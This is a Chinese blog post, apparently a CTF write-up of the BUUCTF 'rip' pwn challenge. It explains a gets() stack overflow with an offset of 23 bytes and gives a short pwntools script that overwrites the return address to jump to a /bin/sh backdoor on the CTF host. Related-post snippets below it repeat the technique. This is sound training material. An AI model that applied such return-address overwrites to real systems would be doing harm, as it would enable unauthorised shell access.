[buuctf] rip

最新推荐文章于 2024-04-26 17:43:46 发布
最新推荐文章于 2024-04-26 17:43:46 发布
阅读量663 收藏 2
点赞数
分类专栏: PWN学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zn106414/article/details/123864656
版权

64位,源程序几乎没有开启任何保护

用ida打开

存在危险函数gets,没有限制输入,存在栈溢出漏洞

还有一个func函数执行了/bin/sh命令

 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址

因为是64位程序,还需要加8字节的返回地址,因此偏移量为23

或者这里也可以使用pwntools计算一下:

pattern create 200

pattern offset A(AADAA;

 也可以确定偏移量是23

因此编写脚本

调用/bin/sh的地址为0x40118A

##!/usr/bin/env python
from pwn import *
sh = remote('node4.buuoj.cn',27748)
target = 0x40118A
sh.sendline('A' * (23) + p64(target))
sh.interactive()

糖嬷嬷
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RIP作业1111111
04-22
RIP作业1111111
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1488
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF-rip(新手pwner的成长日记2)
weixin_58410275的博客
04-22 508
什么保护都没有开启,目测是个简单题,其实就是个简单题,初步判定栈溢出的ret2text吧,后续再看情况。
pwn | BUUCTF rip 1&& pwn基本思路
最新发布
Mintind的博客
04-26 979
(写得好详细我好爱(为什么payload有两种写法于。
PWN学习记录(2)BUUCTF-rip
m0_58824086的博客
07-31 237
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到\n 结束,则会无限读取,没有上限。由**char s[15]**可得,在main函数的栈帧中,划分了一个15字节的存储空间,也就是说只需要存入15个字节地址,就可以get函数返回地址。可以发现,这是一个64位的ELF文件,可得每个存储单元是8个字节,即一个字节是8位,同理32位就是4个字节。dup():重复定义圆括号中指定的初值,次数由前面的数值决定。
【Pwn | CTF】BUUCTF rip1
weixin_46301214的博客
02-02 555
可能是因为fun函数里有system这种终端控制函数,所以能getshell吧。那么来看一下main,发现很简单,只有一个gets获取输入,存到s数组变量里。打开IDA,发现函数里有一个fun函数,能直接调用系统函数。然后又可以建立连接,很屌,解释不清楚,以后做多两题才懂。知道了缓冲区大小,下一步就要知道fun函数的入口地址。这文件是在靶机,就是靶机存在这个漏洞,我们要攻击他。从汇编上看,是能够发现有注释告诉我们的入口地址。我们要做的就是利用这个函数进行调用系统函数。看一下双击s变量,缓冲区大小。
BUUCTF的第二题rip&一道ret2libc
I_ET5u5的博客
12-11 239
buuctf的第二题和一道ret2libc的小难点
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4805
BUU CTF PWN 入门知识详解
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 542
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 330
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
BUUCTFrip
^_^
12-08 3227
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTF 【Pwn】rip 解题步骤
2301_81505831的博客
01-25 716
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
浅析rip协议
02-20
RIP协议是一种在网关与主机之间交换路由选择信息的标准,本ppt对其进行了简要介绍
rip笔记及RIP配置实例
11-10
rip基本原理 RIP路由器的形成 RIP的更新与维护 触发更新 RIP-2的增强特性 水平分割和毒性反转 多进程和多实例 RIP与BFD联动
4RIP .pka
04-03
4RIP 4RIP .pka
RIP协议解析.docx
10-13
RIP协议解析.docx
BUUCTF-rip
m0_64180167的博客
04-11 646
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF -rip
weixin_56301399的博客
07-20 373
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值